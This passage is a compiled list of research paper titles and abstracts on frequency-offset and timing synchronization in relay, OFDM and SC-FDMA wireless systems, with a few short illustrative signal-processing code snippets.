results. --- paper_title: Timing and Frequency Offsets Compensation in Relay Transmission for 3GPP LTE Uplink paper_content: Relays can be used between the source and the destination to improve network coverage or reliability. In the relay based distributed space-time block-coded (DSTBC) single-carrier (SC) transmission scheme, asynchronism in time and frequency causes degradation in system performance because of the interblock interference, non-coherent combining and multiuser interference. The simultaneous presence of timing offset and carrier frequency offset also destroy the orthogonal structure of DSTBC. In this paper, we study the combined effect of timing offset and carrier frequency offset and propose a two stage equalization technique for this system at the destination terminal. Technique is based on interference cancellation and cyclic prefix reconstruction. The proposed equalization technique maintains the orthogonal structure of DSTBC and allows the use of low complexity one-tap frequency-domain equalizer. The technique significantly alleviates the effect of time offsets and frequency offsets at the destination without increasing the complexity of the receiver or disturbing the 3rd generation partnership project-long term evolution (3GPP LTE) uplink frame structure or the data rate over frequency selective channels. --- paper_title: Inter-carrier interference-free Alamouti-coded OFDM for cooperative systems with frequency offsets in non-selective fading environments paper_content: A modified Alamouti-coded orthogonal frequency division multiplexing (OFDM) scheme is proposed for cooperative systems in non-selective fading environments. Even with the frequency offset between two distributed transmit antennas, the proposed scheme achieves ideal performance and full rate of Alamouti code. 
By switching subcarriers in the second OFDM symbol of each Alamouti-coded OFDM symbol pair after a simple-phase rotation in the first OFDM symbol, inter-carrier interference terms can be perfectly cancelled after a simple linear combining with the processing overhead of two times down-conversions and discrete Fourier transform (DFT) operations at each OFDM symbol. --- paper_title: Joint Carrier Frequency Offset and fast time-varying channel estimation for MIMO-OFDM systems paper_content: In this paper, a novel pilot-aided iterative algorithm is developed for MIMO-OFDM systems operating in fast time-varying environment. An L-path channel model with known path delays is considered to jointly estimate the multi-path Rayleigh channel complex gains and Carrier Frequency Offset (CFO). Each complex gain time-variation within one OFDM symbol is approximated by a Basis Expansion Model (BEM) representation. An auto-regressive (AR) model is built for the parameters to be estimated. The algorithm performs recursive estimation using Extended Kalman Filtering. Hence, the channel matrix is easily computed and the data symbol is estimated with free inter-sub-carrier-interference (ICI) when the channel matrix is QR-decomposed. It is shown that only one iteration is sufficient to approach the performance of the ideal case for which the knowledge of the channel response and CFO is available. --- paper_title: Training-Based Synchronization and Channel Estimation in AF Two-Way Relaying Networks paper_content: Two-way relaying networks (TWRNs) allow for more bandwidth efficient use of the available spectrum since they allow for simultaneous information exchange between two users with the assistance of an intermediate relay node. However, due to superposition of signals at the relay node, the received signal at the user terminals is affected by multiple impairments, i.e., channel gains, timing offsets, and carrier frequency offsets, that need to be jointly estimated and compensated. This paper presents a training-based system model for amplify-and-forward (AF) TWRNs in the presence of multiple impairments and proposes maximum likelihood and differential evolution based algorithms for joint estimation of these impairments. The Cramer-Rao lower bounds (CRLBs) for the joint estimation of multiple impairments are derived. A minimum mean-square error based receiver is then proposed to compensate the effect of multiple impairments and decode each user's signal. Simulation results show that the performance of the proposed estimators is very close to the derived CRLBs at moderate-to-high signal-to-noise-ratios. It is also shown that the bit-error rate performance of the overall AF TWRN is close to a TWRN that is based on assumption of perfect knowledge of the synchronization parameters. --- paper_title: Network-Wide Distributed Carrier Frequency Offsets Estimation and Compensation via Belief Propagation paper_content: In this paper, we propose a fully distributed algorithm for frequency offsets estimation in decentralized systems. With the proposed algorithm, each node estimates its frequency offsets by local computations and limited exchange of information with its direct neighbors. Such algorithm does not require any centralized information processing or knowledge of global network topology. It is shown analytically that the proposed algorithm always converges to the optimal estimates regardless of network topology. 
Simulation results demonstrate the fast convergence of the algorithm and show that the estimation mean-squared error at each node touches the centralized Cramér-Rao bound within a few iterations of message exchange. Therefore, the proposed method has low overhead and is scalable with network size. --- paper_title: Blind Timing and Carrier Synchronization in Decode and Forward Cooperative Systems paper_content: Synchronization in Decode and Forward (DF) cooperative communication systems is a complex and challenging task requiring estimation of many independent timing and carrier offsets at each relay in the broadcasting phase and multiple timing and carrier offsets at the destination in the relaying phase. This paper presents a scheme for blind channel, timing and carrier offset estimation in a DF cooperative system with one source, M relays and one destination equipped with N antennas. In particular, we exploit blind source separation at the destination to convert the difficult problem of jointly estimating multiple synchronization parameters in the relaying phase into more tractable sub-problems of estimating many individual timing and carrier offsets for the independent relays. We also modify and propose a criterion for best relay selection at the destination. Simulation results demonstrate the excellent end-to-end Bit Error Rate (BER) performance of the proposed blind scheme with relay selection, which is shown to achieve the maximum diversity order with M = 4 relays using N = 5 antennas at the destination. The presented work is a complete solution to blind synchronization and channel estimation in DF cooperative communication systems. --- paper_title: Alamouti Coding Scheme for AF Relaying With Doppler Shifts paper_content: In this paper, we propose an Alamouti-code-based relaying scheme for frequency asynchronous amplify-and-forward (AF) relay networks. Both the oscillator frequency offsets and the Doppler shifts among the distributed nodes are considered in our design. We employ orthogonal frequency-division multiplexing (OFDM) modulation at the source node and let the two relay nodes implement only simple operations, such as time reversal, conjugation, and amplification. We show that without Doppler shifts, the multiple carrier frequency offsets (CFOs) can be directly compensated at the destination, and the received signals exhibit an Alamouti-like structure. We further prove that full spatial diversity can be achieved by the fast symbol-wise detection when the oscillator frequency offset between the relay nodes is smaller than a certain threshold, which yields lower decoding complexity compared with the existing schemes. In the case with Doppler shifts, where the direct CFO compensation becomes impossible, we develop a repetition-aided Alamouti coding approach, by which full diversity can be nearly achieved from the fast symbol-wise detection. Numerical results are provided to corroborate the proposed studies. --- paper_title: Space–Frequency Convolutional Coding for Frequency-Asynchronous AF Relay Networks paper_content: In this paper, we design a space-frequency (SF) convolutional coding scheme for amplify-and-forward (AF) relay networks that contain multiple distributed relay nodes. The frequency-asynchronous nature of the distributed system is considered in our design. Orthogonal frequency-division multiplexing (OFDM) modulation is adopted, which is robust to certain timing errors.
We exploit the signal space diversity technique and employ an extended cyclic prefix (CP) at the source node. The relay nodes need to perform only simple operations, e.g., convolution and amplification, and they need no information about the channels and the frequency offsets. Attributed to the extended CP, the multiple frequency offsets can directly be compensated at the destination. We further prove that both spatial and multipath diversity can be achieved by the proposed scheme. Numerical results are provided to corroborate the proposed studies. --- paper_title: Multiple CFO Mitigation in Amplify-and-Forward Cooperative OFDM Transmission paper_content: In cooperative orthogonal frequency division multiplexing (OFDM) systems, accurate frequency synchronization is critical to achieving any potential gains brought by the cooperative operation. The carrier frequency offsets (CFOs) present among multiple nodes (source, relays and destination) are more difficult to tackle than the single CFO problem in point-to-point systems. Multiple CFOs cause phase drift, inter-carrier interference (ICI) and inter-block interference (IBI) in the received signal. This paper deals with the CFO induced interference mitigation problem in distributed space time block coded (STBC) amplify-and-forward (AF) cooperative OFDM systems. We propose a two step approach to recover the phase distortion and suppress the ICI and IBI using low complexity methods to achieve high performance. The first step is time domain (TD) compensation and the second step is frequency domain (FD) decoding. Two TD compensation schemes are proposed, i.e., IBI-removal and ICI-removal. The IBI-removal scheme decouples the two blocks of one STBC codeword completely and then decodes the ICI degraded blocks individually. The ICI-removal scheme removes ICI first and the subsequent decoding requires joint decoding of the two blocks. Simulation results show that the IBI-removal scheme which is of lower complexity performs well with small CFO. For large CFO, the ICI-removal with modified iterative joint maximum likelihood decoding (MIJMLD) outperforms other schemes. --- paper_title: Joint channel, phase noise, and carrier frequency offset estimation in cooperative OFDM systems paper_content: Cooperative communication systems employ cooperation among nodes in a wireless network to increase data throughput and robustness to signal fading. However, such advantages are only possible if there exist perfect synchronization among all nodes. Impairments like channel multipath, time varying phase noise (PHN) and carrier frequency offset (CFO) result in the loss of synchronization and diversity performance of cooperative communication systems. Joint estimation of these multiple impairments is necessary in order to correctly decode the received signal in cooperative systems. In this paper, we propose an iterative pilot-aided algorithm based on expectation conditional maximization (ECM) for joint estimation of multipath channels, Wiener PHNs, and CFOs in amplify-and-forward (AF) based cooperative orthogonal frequency division multiplexing (OFDM) system. Numerical results show that the proposed estimator achieves mean square error performance close to the derived hybrid Cramer-Rao lower bound (HCRB) for different PHN variances. 
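Editor's note: many of the OFDM entries above, the multiple-CFO mitigation and joint phase-noise/CFO estimation papers in particular, are ultimately fighting the inter-carrier interference (ICI) that an uncompensated frequency error creates. The short sketch below makes that mechanism explicit by forming the frequency-domain ICI matrix produced by a single CFO; the FFT size and offset value are arbitrary choices for illustration, not parameters from the cited schemes.

```python
import numpy as np

# Illustrative construction of the frequency-domain ICI matrix created by one
# uncompensated CFO in an OFDM link.
N = 16
eps = 0.1                                      # CFO normalized to the subcarrier spacing
n = np.arange(N)
F = np.fft.fft(np.eye(N)) / np.sqrt(N)         # unitary DFT matrix

ramp = np.diag(np.exp(1j * 2 * np.pi * eps * n / N))   # time-domain CFO phase ramp
C = F @ ramp @ F.conj().T                      # received freq-domain vector is C @ (H * X)

# With eps = 0 this is the identity; with eps != 0 energy leaks off the diagonal (ICI).
diag_power = np.sum(np.abs(np.diag(C)) ** 2)
total_power = np.sum(np.abs(C) ** 2)           # equals N, since C is unitary
print(f"fraction of subcarrier energy kept on the diagonal: {diag_power / total_power:.3f}")
```

The compensation schemes surveyed here either undo the phase ramp in the time domain before the FFT or approximate C by a banded matrix and cancel the dominant off-diagonal terms in the frequency domain.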
--- paper_title: Decentralised ranging method for orthogonal frequency division multiple access systems with amplify-and-forward relays paper_content: In this study, a decentralised ranging method for uplink orthogonal frequency division multiple access (OFDMA) systems with half-duplex (HD) amplify-and-forward (AF) relay stations (RSs) is proposed. In OFDMA systems with HD AF RSs, twice as many resources and as much delay are required as for ranging without an RS. To reduce the required resources and delays for ranging, the authors propose a two-phase ranging scheme based on decentralised timing-offset estimation at each ranging mobile station (MS). In the first phase, the RS occasionally broadcasts a timing reference signal, and in the second phase the RS retransmits the collected ranging signals from the MSs. Then, each ranging MS can individually estimate its own timing offset from the received signals. In the proposed ranging method, the base station does not need to send a timing-adjustment message, and the overhead associated with ranging in the downlink resources, as well as the computational complexity, can be significantly reduced without degrading the timing-offset-estimation performance. Moreover, the delay associated with ranging can be kept the same as for ranging without an RS. --- paper_title: Compensation of multiple carrier frequency offsets in amplify-and-forward cooperative networks paper_content: In this paper, we propose a method to find an optimal correction value for multiple carrier frequency offsets (CFO) compensation, where two received signals have different path gains, in orthogonal frequency division multiplexing (OFDM) systems. Multiple CFOs occur when two spatially-separated transmitters are used to transmit the same signal simultaneously. In this case, the sidelobes of the subcarrier spectra of the undesired signals have similar magnitude with opposite signs. Based on this fact, we propose a self-cancellation method of intercarrier interference caused by multiple CFOs. In the proposed scheme, we compensate the multiple CFOs so that the signal-to-intercarrier-interference power ratio of the received signal is maximized, whereas in the ordinary methods only the signal power is maximized. --- paper_title: Frequency Offset and Channel Estimation in Co-Relay Cooperative OFDM Systems paper_content: Frequency offset and channel estimation in cooperative orthogonal frequency division multiplexing (OFDM) systems is studied in this paper. We consider the scenario of two or more source nodes sharing the same relay, i.e., co-relay cooperative communications, and a new preamble, which is centrally symmetric in the time domain, is proposed to perform the frequency offset and channel estimation. The non-zero samples in the proposed preamble are sparsely distributed with two neighboring non-zero samples being separated by μ > 1 zeros. As long as μ > 2L - 1 is satisfied, the multipath interference can be effectively eliminated, where L stands for the channel order. Unlike [1], the proposed preamble has a much lower Peak-to-Average Power Ratio (PAPR). The interference among the multiple source nodes can also be eliminated by using a backoff modulation scheme on the proposed preamble in each source node, and the mean-square error (MSE) of the proposed Least-Square (LS) channel estimator can be minimized by ensuring the orthogonality among the source nodes.
The Pairwise Error Probability (PEP) performance of the proposed system, considering both the frequency offset and channel estimation errors, is also derived in this paper. For a given Signal-to-Noise Ratio (SNR), by keeping the total power consumed by the source nodes and the relay constant, the PEP can be minimized by adjusting the ratio between the power allocated to the source nodes and the total power. --- paper_title: OFDM Transmission scheme for asynchronous two-way multi-relay cooperative networks with analog network coding paper_content: For two-way relaying assisted by analog network coding, most investigation so far is based on the perfect synchronization assumption. In contrast, in this paper we consider the more practical asynchronism assumption, and develop a new OFDM transmission scheme that is robust to the lack of synchronization in both timing and carrier frequency. In our scheme, the relays' signals are constructed by fusing several OFDM symbols received from the source nodes' transmissions. The source node receivers can successfully demodulate the received OFDM signals after effectively mitigating multiple carrier frequency offsets and multiple timing phase offsets. Simulations are conducted to demonstrate its superior performance. This scheme has the same bandwidth efficiency as the conventional OFDM transmission, and can achieve the same relaying gain as the existing multiple relay transmissions. By relieving the stringent synchronization requirement, this scheme leads to simplified relay design, which makes it more practical to exploit multiple relays in two-way relaying networks. --- paper_title: Carrier Frequency Offset Estimation for Two-Way Relaying: Optimal Preamble and Estimator Design paper_content: We consider the problem of carrier frequency offset (CFO) estimation for a two-way relaying system based on the amplify-and-forward (AF) protocol. Our contributions are in designing an optimal preamble, and the corresponding estimator, to closely achieve the minimum Cramér-Rao bound (CRB) for the CFO. This optimality is asserted with respect to the novel class of preambles, referred to as the block-rotated preambles (BRPs). This class includes the periodic preamble that is used widely in practice, yet it provides an additional degree of design freedom via a block rotation angle. We first identify the catastrophic scenario of an arbitrarily large CRB when a conventional periodic preamble is used. We next resolve this problem by using a BRP with a non-zero block rotation angle. This angle creates, in effect, an artificial frequency offset that separates the desired relayed signal from the self-interference that is introduced in the AF protocol. With appropriate optimization, the CRB incurs only marginal loss from one-way relaying under practical channel conditions. To facilitate implementation, a specific low-complexity class of estimators is examined, and conditions for the estimators to achieve the optimized CRB are established. Numerical results are given which corroborate the theoretical findings. --- paper_title: Joint CFO and Channel Estimation for OFDM-Based Two-Way Relay Networks paper_content: Joint estimation of the carrier frequency offset (CFO) and the channel is developed for a two-way relay network (TWRN) that comprises two source terminals and an amplify-and-forward (AF) relay. The terminals use orthogonal frequency division multiplexing (OFDM).
New zero-padding (ZP) and cyclic-prefix (CP) transmission protocols, which maintain the carrier orthogonality and ensure low estimation and detection complexity, are proposed. Both protocols lead to the same estimation problem which can be solved by the nulling-based least square (LS) algorithm and perform identically when the block length is large. We present detailed performance analysis by proving the unbiasedness of the LS estimators at high signal-to-noise ratio (SNR) and by deriving the closed-form expression of the mean-square-error (MSE). Simulation results are provided to corroborate our findings. --- paper_title: Localized or Interleaved? A Tradeoff between Diversity and CFO Interference in Multipath Channels paper_content: Carrier frequency offset (CFO) damages the orthogonality between sub-carriers and thus causes multiuser interference in uplink OFDMA/SC-FDMA systems. For a given CFO, such multiuser interference is mainly dictated by channel (sub-carrier) allocation, which also specifies the diversity gain of one user over multi-path channels. In particular, the positions of one user's sub-channels will determine its diversity gain, while the distances between sub-channels of the concerned user and those of others will govern the CFO interference. Two popular channel allocation methods are the localized and interleaved (distributed) schemes where the former has less CFO interference but the latter achieves more diversity gain. In this paper, we will consider the channel allocation scheme for uplink LTE systems by investigating the effects of channel allocation on both the diversity gain and the CFO interference. By combining these two effects, we will propose a semi-interleaved scheme, which achieves full diversity gain with minimum CFO interference. --- paper_title: LTE - The UMTS Long Term Evolution: From Theory to Practice paper_content: "Where this book is exceptional is that the reader will not just learn how LTE works but why it works" (Adrian Scrase, ETSI Vice-President, International Partnership Projects). LTE - The UMTS Long Term Evolution: From Theory to Practice provides the reader with a comprehensive system-level understanding of LTE, built on explanations of the theories which underlie it. The book is the product of a collaborative effort of key experts representing a wide range of companies actively participating in the development of LTE, as well as academia. This gives the book a broad, balanced and reliable perspective on this important technology. Lucid yet thorough, the book devotes particular effort to explaining the theoretical concepts in an accessible way, while retaining scientific rigour. It highlights practical implications and draws comparisons with the well-known WCDMA/HSPA standards. The authors not only pay special attention to the physical layer, giving insight into the fundamental concepts of OFDMA, SC-FDMA and MIMO, but also cover the higher protocol layers and system architecture to enable the reader to gain an overall understanding of the system.
Key Features: draws on the breadth of experience of a wide range of key experts from both industry and academia, giving the book a balanced and broad perspective on LTE; provides a detailed description and analysis of the complete LTE system, especially the ground-breaking new physical layer; offers a solid treatment of the underlying advances in fundamental communications and information theory on which LTE is based; addresses practical issues and implementation challenges related to the deployment of LTE as a cellular system; and includes an accompanying website containing a complete list of acronyms related to LTE, with a brief description of each (http://www.wiley.com/go/sesia_theumts). This book is an invaluable reference for all research and development engineers involved in LTE implementation, as well as graduate and PhD students in wireless communications. Network operators, service providers and R&D managers will also find this book insightful. --- paper_title: An interference self-cancellation technique for SC-FDMA systems paper_content: A new interference self-cancellation (ISC) method for Single Carrier-FDMA (SC-FDMA) systems is proposed to mitigate the inter-user interference caused by frequency offset or Doppler effect. By transmitting a compensation symbol at the first symbol location in each resource block, the energy leakage can be significantly suppressed. With little bandwidth and power sacrifice, the proposed method can greatly improve the system robustness against frequency offset. Simulation results show that the signal-to-interference ratio (SIR) can be improved by 7 dB on average for the entire system band, and up to 11.7 dB for an individual user. --- paper_title: Adaptive schemes and analysis for blind beamforming with insufficient cyclic prefix in single carrier-frequency division multiple access systems paper_content: When the duration of the cyclic prefix (CP) is shorter than that of the channel impulse response in single carrier-frequency division multiple access systems, inter-symbol interference and inter-carrier interference will degrade the system performance. Previously, one solution to this problem, considering the effect of carrier frequency offsets (CFOs) and the co-channel interference, was a blind receive beamforming scheme based on eigenanalysis in a batch mode. As the capability in suppressing the multipath signal with the delay larger than the CP length has not previously been analysed theoretically for the scheme, the theoretical analysis regarding the capability in suppressing the long-delayed multipath signal is provided in this study. The analysis provided in this study is also utilised to design an adaptive processing scheme. The adaptive algorithm is developed to find the beamforming weight vector updated on a per symbol basis without using reference signals. The proposed adaptive algorithm reduces the computational complexity and shows competitive performance under the insufficient CP, the CFOs, the co-channel interference and the time-varying scenarios. The simulation results reveal that the proposed adaptive algorithm provides better performance than the previously proposed algorithm.
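For illustration only: several of the surrounding references target SC-FDMA, i.e., DFT-spread OFDM with localized subcarrier mapping. The sketch below is a hedged toy (block sizes and the allocation are assumed; no cited scheme is reproduced) that builds one localized SC-FDMA block and prints a crude peak-to-average power ratio, the property that motivates SC-FDMA over OFDMA in the uplink.

```python
import numpy as np

def scfdma_modulate(d, n_sub, start):
    """Localized SC-FDMA (DFT-spread OFDM): M-point DFT, map onto contiguous
    subcarriers of an n_sub-point grid, then n_sub-point IFFT."""
    m = len(d)
    spread = np.fft.fft(d) / np.sqrt(m)          # DFT spreading
    grid = np.zeros(n_sub, dtype=complex)
    grid[start:start + m] = spread               # localized mapping (assumed allocation)
    return np.fft.ifft(grid) * np.sqrt(n_sub)    # time-domain block (CP omitted here)

np.random.seed(1)
qpsk = (np.random.choice([-1, 1], 16) + 1j * np.random.choice([-1, 1], 16)) / np.sqrt(2)
x = scfdma_modulate(qpsk, n_sub=64, start=8)
papr = np.max(np.abs(x) ** 2) / np.mean(np.abs(x) ** 2)
print(f"PAPR of this block: {10 * np.log10(papr):.2f} dB")
```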
--- paper_title: Uplink single-carrier frequency division multiple access system with joint equalisation and carrier frequency offsets compensation paper_content: Similar to the orthogonal frequency division multiple access (OFDMA) system, the single-carrier frequency division multiple access (SC-FDMA) system also suffers from frequency mismatches between the transmitter and the receiver. As a result, in this system, the carrier frequency offsets (CFOs) disrupt the orthogonality between subcarriers and give rise to inter-carrier interference (ICI) and multiple access interference (MAI) among users. The authors present a new minimum mean square error (MMSE) equaliser, which jointly performs equalisation and carrier frequency offsets (CFOs) compensation. The mathematical expression of this equaliser has been derived taking into account the MAI and the channel noise. A low complexity implementation of the proposed equalisation scheme using a banded matrix approximation is presented here. From the obtained simulation results, the proposed equalisation scheme is able to enhance the performance of the SC-FDMA system, even in the presence of estimation errors. --- paper_title: Adaptive Frequency-Domain RLS DFE for Uplink MIMO SC-FDMA paper_content: It is well known that, in the case of highly frequency-selective fading channels, the linear equalizer (LE) can suffer significant performance degradation compared with the decision feedback equalizer (DFE). In this paper, we develop a low-complexity adaptive frequency-domain DFE (AFD-DFE) for single-carrier frequency-division multiple-access (SC-FDMA) systems, where both the feedforward and feedback filters operate in the frequency domain and are adapted using the well-known block recursive least squares (RLS) algorithm. Since this DFE operates entirely in the frequency domain, the complexity of the block RLS algorithm can be substantially reduced when compared with its time-domain counterpart by exploiting a matrix structure in the frequency domain. Furthermore, we extend our formulation to multiple-input–multiple-output (MIMO) SC-FDMA systems, where we show that the AFD-DFE enjoys a significant reduction in computational complexity when compared with the frequency-domain nonadaptive DFE. Finally, extensive simulations are carried out to demonstrate the robustness of our proposed AFD-DFE to high Doppler and carrier frequency offset (CFO). --- paper_title: Combined MMSE-FDE and Interference Cancellation for Uplink SC-FDMA with Carrier Frequency Offsets paper_content: Due to its lower peak-to-average power ratio (PAPR) compared with orthogonal frequency division multiple access (OFDMA), single carrier frequency division multiple access (SC-FDMA) has been recently accepted as the uplink multiple access scheme in the Long Term Evolution (LTE) of cellular systems by the Third Generation Partnership Project (3GPP). However, similar to OFDMA, carrier frequency offset (CFO) can destroy the orthogonality among subcarriers and degrade the performance of SC-FDMA. To mitigate the effect of CFOs, we propose a combined minimum mean square error frequencydomain equalization (MMSE-FDE) and interference cancellation scheme. In this scheme, joint FDE with CFO compensation (JFC) is utilized to obtain the initial estimation for each user. In contrast to previous schemes, where the FDE and CFO compensation are done separately, in JFC, the MMSE FDE is designed to suppress the MUI after CFO compensation. 
To further eliminate the MUI, we combine JFC with parallel interference cancellation (PIC). In particular, we iteratively design the MMSE FDE equalizer to suppress the remaining MUI at each stage and obtain better estimation. Simulation results show that the proposed scheme can significantly improve the system performance. --- paper_title: CFO Estimation and Compensation in SC-IFDMA Systems paper_content: Single carrier interleaved frequency division multiple access (SC-IFDMA) has been recently receiving much attention for uplink multiuser access in the next generation mobile systems because of its lower peak-to-average transmit power ratio (PAPR). In this paper, we investigate the effect of carrier frequency offset (CFO) on SC-IFDMA and propose a new low-complexity time domain linear CFO compensation (TD-LCC) scheme. The TD-LCC scheme can be combined with successive interference cancellation (SIC) to further improve the system performance. The combined method will be referred to as TD-CC-SIC. We shall study the use of user equipment (UE) ordering algorithms in our TD-CC-SIC scheme and propose both optimal and suboptimal ordering algorithms in the MMSE sense. We also analyze both the output SINR and the BER performance of the proposed TD-LCC and TD-CC-SIC schemes. Simulation results along with theoretical SINR and BER results will show that the proposed TD-LCC and TD-CC-SIC schemes greatly reduce the CFO effect on SC-IFDMA. We also propose a new blind CFO estimation scheme for SC-IFDMA systems when the numbers of subcarrier sets allocated to different UEs are not the same due to their traffic requirements. Compared to the conventional blind CFO estimation schemes, it is shown that by using a virtual UE concept, the proposed scheme does not have the CFO ambiguity problem, and in some cases can improve the throughput efficiency since it does not need to increase the length of cyclic prefix (CP). --- paper_title: Suppression of ICI and MAI in SC-FDMA communication system with carrier frequency offsets paper_content: Similar to other orthogonal frequency division multiplexing (OFDM)-based systems, carrier frequency offset (CFO) is a challenging problem in uplink communications of single carrier frequency division multiple access (SC-FDMA) system. It must be noticed that CFO, which is mainly due to oscillator instability and/or Doppler shift, would generate inter carrier interference (ICI) as well as multi-access interference (MAI) to disturb the received signals and seriously degrade system performance. Frequency synchronization in uplink communications is difficult because different users always experience different CFOs and one user's CFO correction would misalign other users. In this paper, we proposed a suppression method to overcome the multi CFOs problem. To implement this algorithm, block type pilots would be exploited, which is also utilized in LTE uplink standard. The proposed algorithm is based on the following two assumptions. Firstly the proposed algorithm is applied in this scenario, where different users start to communicate with the base station at different symbol periods, and secondly, during the pilot block and the following data blocks, the CFO of each user is quasi static, which is feasible since CFO is slow varying. Compared with other interference suppression methods, the proposed method could directly estimate the interference components from the inverse pilot matrix, thus it does not need to do the CFO estimation. 
Furthermore, since block-type pilots are a common pilot pattern in wireless communication systems, this algorithm can be easily extended to other communication systems. Simulation results show that the proposed suppression algorithm can significantly improve system performance. --- paper_title: Low-complexity joint regularised equalisation and carrier frequency offsets compensation scheme for single-carrier frequency division multiple access system paper_content: Since the conventional zero-forcing receiver does not operate satisfactorily in interference-limited environments because of its noise amplification, and the statistics of the transmitted data and the additive noise are required for the minimum-mean-square error receiver, the potential of the regularised receiver is investigated in this study to cope with these problems. In this study, the authors introduce an efficient low-complexity joint regularised equalisation and carrier frequency offset compensation (LJREC) scheme for single-carrier frequency division multiple access system. The proposed LJREC scheme avoids the noise amplification problem and the estimation of the signal-to-noise ratio and the interference matrices of other users. From the obtained simulation results, the proposed scheme enhances the system performance with lower complexity and sufficient robustness to the estimation errors. --- paper_title: Blind Channel Shortening for Asynchronous SC-IFDMA Systems with CFOs paper_content: This paper proposes a blind channel shortening algorithm for uplink reception of a single-carrier interleaved frequency-division multiple-access (SC-IFDMA) system transmitting over a highly-dispersive channel, which is affected by both timing offsets (TOs) and frequency offsets (CFOs). When the length of the cyclic prefix (CP) is insufficient to compensate for channel dispersion and TOs, a common strategy is to shorten the channel by means of time-domain equalization, in order to restore CP properties and ease signal reception. The proposed receiver exhibits a three-stage structure: the first stage performs blind shortening of all the user channel impulse responses (CIRs), by adopting the minimum mean-output energy criterion, without requiring either a priori knowledge of the CIRs to be shortened or preliminary compensation of the CFOs; the second stage performs joint compensation of the CFOs; finally, to alleviate noise amplification effects, possibly arising from CFO compensation, the third stage implements per-user signal-to-noise ratio (SNR) maximization, without requiring knowledge of the shortened CIRs. A theoretical analysis is carried out to assess the effectiveness of the proposed shortening algorithm in the high-SNR regime; moreover, the performances of the overall receiver are validated and compared with those of existing methods by extensive Monte Carlo computer simulations. --- paper_title: Joint Low-Complexity Equalization and Carrier Frequency Offsets Compensation Scheme for MIMO SC-FDMA Systems paper_content: Due to their noise amplification, conventional Zero-Forcing (ZF) equalizers are not suited for interference-limited environments such as the Single-Carrier Frequency Division Multiple Access (SC-FDMA) in the presence of Carrier-Frequency Offsets (CFOs). Moreover, they suffer increasing complexity with the number of subcarriers and in particular with Multiple-Input Multiple-Output (MIMO) systems.
In this letter, we propose a Joint Low-Complexity Regularized ZF (JLRZF) equalizer for MIMO SC-FDMA systems to cope with these problems. The main objective of this equalizer is to avoid the direct matrix inversion by performing it in two steps to reduce the complexity. We add a regularization term in the second step to avoid the noise amplification. From the obtained simulation results, the proposed scheme is able to enhance the system performance with lower complexity and sufficient robustness to estimation errors. --- paper_title: Improved Detection of Uplink OFDM-IDMA Signals with Carrier Frequency Offsets paper_content: This letter proposes an improved detection scheme to mitigate the influence of carrier frequency offsets (CFOs) in uplink orthogonal frequency division multiplexing-interleave division multiple access (OFDM-IDMA) systems. The basic principle is to iteratively estimate and cancel the combined interference from multiple users and CFOs at the receiver so that the additional interference due to the residual CFOs from other users can be suppressed. Simulation results show that the proposed scheme can effectively eliminate the interference and significantly improve the system performance in the presence of CFOs. --- paper_title: MMSE Solution for OFDMA Systems with Carrier Frequency Offset Correction paper_content: The multi-access orthogonal frequency division multiplexing (OFDMA) technology has drawn a lot of attention in next generation wireless mobile communications. It is well-known that carrier frequency offsets in OFDMA systems can destroy the orthogonality among subcarriers and produce intercarrier interference (ICI) and multiuser interference (MUI). In our previous works, we proposed a common carrier frequency offset (CCFO) correction scheme at the OFDMA receiver, which can reduce the ICI/MUI effect and the bit error rate. In the scheme, the CFO correction can be performed by adaptively converging the MSE between the demodulated output and the decision feedback data. This paper studies the minimum MSE solution for the CCFO value, and the result is exploited to verify the adaptive CCFO estimation algorithm by means of the decision feedback. Simulation results show that the adaptive decision feedback scheme for CCFO estimation is effective and the minimum MSE performance is well achieved. --- paper_title: Multi-User Interference Cancellation Schemes for Carrier Frequency Offset Compensation in Uplink OFDMA paper_content: Each user in the uplink of an Orthogonal Frequency Division Multiple Access (OFDMA) system may experience a different carrier frequency offset (CFO). These uncorrected CFOs destroy the orthogonality among subcarriers, causing inter-carrier interference and multi-user interference, which degrade the system performance severely. In this paper, novel time-domain multi-user interference cancellation schemes for OFDMA uplink are proposed. They employ an architecture with multiple OFDMA-demodulators to compensate for the impacts of multi-user CFOs at the base station's side. Analytical and numerical evaluations show that the proposed schemes achieve a significant performance gain compared to the conventional receiver and a reference frequency-domain multi-user interference cancellation scheme. In a particular scenario, a maximum CFO of up to 40% of the subcarrier spacing can be tolerated, and the CFO-free performance is maintained in the OFDMA uplink.
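As a hedged illustration of the common linear model behind the MMSE-style uplink receivers summarized above: each user's CFO turns the ideal diagonal frequency-domain mapping into a full leakage matrix, and the base station jointly inverts the stacked system. The toy sketch below (two users, interleaved allocation, flat unit channels, all values assumed; it is not any specific cited detector) builds that leakage matrix and applies a one-shot MMSE correction.

```python
import numpy as np

def leakage_matrix(N, eps):
    """Pi(eps) = F diag(exp(j2*pi*eps*n/N)) F^H: maps transmitted frequency-domain
    symbols to received bins for a user arriving with normalized CFO eps."""
    n = np.arange(N)
    F = np.exp(-2j * np.pi * np.outer(n, n) / N) / np.sqrt(N)
    return F @ np.diag(np.exp(2j * np.pi * eps * n / N)) @ F.conj().T

np.random.seed(3)
N, sigma2 = 32, 0.01
alloc = {0: np.arange(0, N, 2), 1: np.arange(1, N, 2)}   # interleaved allocation (assumed)
cfo = {0: 0.10, 1: -0.12}                                # per-user CFOs (assumed)

# stack per-user columns of the effective mixing matrix (flat unit channels assumed)
A = np.hstack([leakage_matrix(N, cfo[u])[:, alloc[u]] for u in alloc])
X = np.hstack([np.random.choice([-1.0, 1.0], len(alloc[u])) for u in alloc])
R = A @ X + np.sqrt(sigma2 / 2) * (np.random.randn(N) + 1j * np.random.randn(N))

W = A.conj().T @ np.linalg.inv(A @ A.conj().T + sigma2 * np.eye(N))   # MMSE filter
print("residual MSE after joint CFO compensation:", np.mean(np.abs(W @ R - X) ** 2))
```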
